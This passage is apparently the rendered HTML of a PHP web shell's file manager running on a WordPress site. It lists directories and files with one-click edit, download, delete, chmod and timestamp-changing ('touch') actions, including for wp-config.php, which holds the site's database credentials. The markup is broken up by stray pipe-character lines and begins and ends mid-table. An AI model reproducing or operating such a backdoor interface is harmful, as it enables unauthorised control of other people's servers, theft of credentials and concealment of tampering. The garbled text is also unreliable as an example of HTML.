<td><input type="checkbox" name="actbox[]" onclick="ls_reverse_all();"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fwp-admin';document.todo.sort.value='0a';document.todo.submit();">[wp-admin]</a></td>
|
||||||
|
<td>DIR</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-admin';document.todo.submit();">21.07.2009 01:20:14</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-admin';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td>
|
||||||
|
<td><input type="checkbox" name="actbox[]" id="actbox1" value="/var/www/html/wordpress/wp-admin"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fwp-content';document.todo.sort.value='0a';document.todo.submit();">[wp-content]</a></td>
|
||||||
|
<td>DIR</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-content';document.todo.submit();">14.01.2010 10:59:59</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-content';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td>
|
||||||
|
<td><input type="checkbox" name="actbox[]" id="actbox2" value="/var/www/html/wordpress/wp-content"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fwp-content-new';document.todo.sort.value='0a';document.todo.submit();">[wp-content-new]</a></td>
|
||||||
|
<td>DIR</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-content-new';document.todo.submit();">05.02.2009 18:09:15</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-content-new';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td>
|
||||||
|
<td><input type="checkbox" name="actbox[]" id="actbox3" value="/var/www/html/wordpress/wp-content-new"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fwp-includes';document.todo.sort.value='0a';document.todo.submit();">[wp-includes]</a></td>
|
||||||
|
<td>DIR</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-includes';document.todo.submit();">27.11.2009 23:30:49</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-includes';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td>
|
||||||
|
<td><input type="checkbox" name="actbox[]" id="actbox4" value="/var/www/html/wordpress/wp-includes"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='.htaccess';document.todo.submit();">.htaccess</a></td>
|
||||||
|
<td>301 B</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='.htaccess';document.todo.submit();">01.09.2009 09:30:43</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='.htaccess';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='.htaccess';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='.htaccess';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='.htaccess';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox5" value="/var/www/html/wordpress/.htaccess"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='clear.js';document.todo.submit();">clear.js</a></td>
|
||||||
|
<td>1.02 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='clear.js';document.todo.submit();">12.01.2010 03:48:34</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='clear.js';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='clear.js';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='clear.js';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='clear.js';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox6" value="/var/www/html/wordpress/clear.js"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='index.php';document.todo.submit();">index.php</a></td>
|
||||||
|
<td>397 B</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='index.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='index.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='index.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='index.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='index.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox7" value="/var/www/html/wordpress/index.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='license.txt';document.todo.submit();">license.txt</a></td>
|
||||||
|
<td>15.05 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='license.txt';document.todo.submit();">04.11.2009 16:49:41</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='license.txt';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='license.txt';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='license.txt';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='license.txt';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox8" value="/var/www/html/wordpress/license.txt"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='readme.html';document.todo.submit();">readme.html</a></td>
|
||||||
|
<td>7.46 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='readme.html';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='readme.html';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='readme.html';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='readme.html';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='readme.html';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox9" value="/var/www/html/wordpress/readme.html"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-app.php';document.todo.submit();">wp-app.php</a></td>
|
||||||
|
<td>39.82 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-app.php';document.todo.submit();">04.11.2009 16:49:39</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-app.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-app.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-app.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-app.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox10" value="/var/www/html/wordpress/wp-app.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-atom.php';document.todo.submit();">wp-atom.php</a></td>
|
||||||
|
<td>541 B</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-atom.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-atom.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-atom.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-atom.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-atom.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox11" value="/var/www/html/wordpress/wp-atom.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-blog-header.php';document.todo.submit();">wp-blog-header.php</a></td>
|
||||||
|
<td>293 B</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-blog-header.php';document.todo.submit();">27.11.2009 23:27:51</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-blog-header.php';document.todo.submit();"><b><font color=green>-rwxr-xr-x</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-blog-header.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-blog-header.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-blog-header.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox12" value="/var/www/html/wordpress/wp-blog-header.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-comments-post.php';document.todo.submit();">wp-comments-post.php</a></td>
|
||||||
|
<td>3.56 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-comments-post.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-comments-post.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-comments-post.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-comments-post.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-comments-post.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox13" value="/var/www/html/wordpress/wp-comments-post.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-commentsrss2.php';document.todo.submit();">wp-commentsrss2.php</a></td>
|
||||||
|
<td>238 B</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-commentsrss2.php';document.todo.submit();">04.11.2009 16:49:39</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-commentsrss2.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-commentsrss2.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-commentsrss2.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-commentsrss2.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox14" value="/var/www/html/wordpress/wp-commentsrss2.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-config-sample.php';document.todo.submit();">wp-config-sample.php</a></td>
|
||||||
|
<td>2.56 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-config-sample.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-config-sample.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-config-sample.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-config-sample.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-config-sample.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox15" value="/var/www/html/wordpress/wp-config-sample.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-config.php';document.todo.submit();">wp-config.php</a></td>
|
||||||
|
<td>1.21 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-config.php';document.todo.submit();">27.11.2009 23:08:37</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-config.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-config.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-config.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-config.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox16" value="/var/www/html/wordpress/wp-config.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-cron.php';document.todo.submit();">wp-cron.php</a></td>
|
||||||
|
<td>1.22 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-cron.php';document.todo.submit();">04.11.2009 16:49:41</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-cron.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-cron.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-cron.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-cron.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox17" value="/var/www/html/wordpress/wp-cron.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-feed.php';document.todo.submit();">wp-feed.php</a></td>
|
||||||
|
<td>220 B</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-feed.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-feed.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-feed.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-feed.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-feed.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox18" value="/var/www/html/wordpress/wp-feed.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-links-opml.php';document.todo.submit();">wp-links-opml.php</a></td>
|
||||||
|
<td>1.9 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-links-opml.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-links-opml.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-links-opml.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-links-opml.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-links-opml.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox19" value="/var/www/html/wordpress/wp-links-opml.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-links.php';document.todo.submit();">wp-links.php</a></td>
|
||||||
|
<td>22.7 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-links.php';document.todo.submit();">14.01.2010 11:48:42</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-links.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-links.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-links.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-links.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox20" value="/var/www/html/wordpress/wp-links.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-load.php';document.todo.submit();">wp-load.php</a></td>
|
||||||
|
<td>2.29 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-load.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-load.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
